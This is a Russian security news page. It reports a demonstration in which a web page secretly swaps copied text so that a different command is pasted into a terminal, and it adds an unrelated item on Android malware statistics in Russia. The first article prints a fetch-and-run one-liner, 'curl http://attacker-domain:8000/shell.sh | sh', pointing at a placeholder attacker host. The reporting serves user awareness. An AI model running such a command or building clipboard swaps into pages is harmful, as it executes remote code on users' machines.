Эксперт показал подмену скопированной на веб-странице команды

Эксперт показал подмену скопированной на веб-странице команды

Ряд программистов, системных администраторов и исследователей привыкли копировать определённые куски кода на веб-страницах, а затем вставлять их, например, в консоль или терминал. Как оказалось, это пагубная практика, которая может привести к негативным для устройства последствиям.

Габриэль Фридлендер, основатель платформы для обучения основам кибербезопасности — Wizer, показал очевидный, но при этом интересный приём, который заставит по-новому взглянуть на процесс копирования-вставки с веб-страниц.

Суть в том, что при копировании страница может незаметно подменить содержимое буфера обмена, что приведёт к использованию совершенно другой команды на устройстве пользователя. Поскольку как новички, так и уже опытные сисадмины привыкли иногда «копипастить» код (характерный пример — со StackOverflow), будет полезно помнить про описанную Фридлендером технику.

Специалист даже опубликовал в блоге тривиальный демонстрационный код (proof-of-concept, PoC) и просит читателей попробовать скопировать простейшую команду, с которой знакомо подавляющее большинство системных администраторов:

 

После вставки скопированной команды в любой текстовый редактор пользователь увидит совершенно другое:

curl http://attacker-domain:8000/shell.sh | sh

Примечательно, что при вставке этой команды в терминал Linux она моментально выполнится, что создаёт ещё больший риск, ведь пользователь даже не успеет проверить корректность введённых данных.

Как пояснил Фридлендер, суть трюка кроется в JavaScript-коде, размещённом на демонстрационной странице:

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Количество атак на Android в России увеличилось в 5 раз

По данным «Лаборатории Касперского», в I квартале 2024 года атакам подверглись свыше 19 млн российских пользователей Android-устройств — в 5,2 раза больше, чем годом ранее.

Рост вредоносной активности, по мнению экспертов, связан с расширением использования сторонних источников софта: многие ходовые приложения исчезли из Google Play.

Наиболее часто на смартфонах детектировались модульный загрузчик Dwphon и банковский троян Mamont. Первый зловред собирает и сливает на сторону информацию о зараженном устройстве и личные данные владельца, второй ворует платежные данные и СМС с кодами подтверждения транзакций.

Распространители Android-вредоносов обычно выдают их за легитимный софт или пиратскую копию, а для раздачи создают поддельные сайты. С подобными фейками можно также столкнуться в неофициальных магазинах приложений — вроде APKPure; иногда вирусописателям удается протащить их в Google Play. Предустановка, как в случае с Dwphon, встречается гораздо реже и обычно на дешевых OEM-гаджетах.

По данным Statcounter, в настоящее время на долю Android приходится 30,29% российского рынка ОС. По популярности она занимает второе место — после Windows (49,14%). Вместе с тем экосистема Android по-прежнему фрагментарна, и обновления с патчами и новыми защитными функциями получают далеко не все пользователи.

Удаление из магазина Google приложений подсанкционных российских компаний провоцирует появление вредоносных и потенциально опасных подделок. Пользователям рекомендуется при скачивании вначале удостовериться, что софт действительно связан с заявленной организацией.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru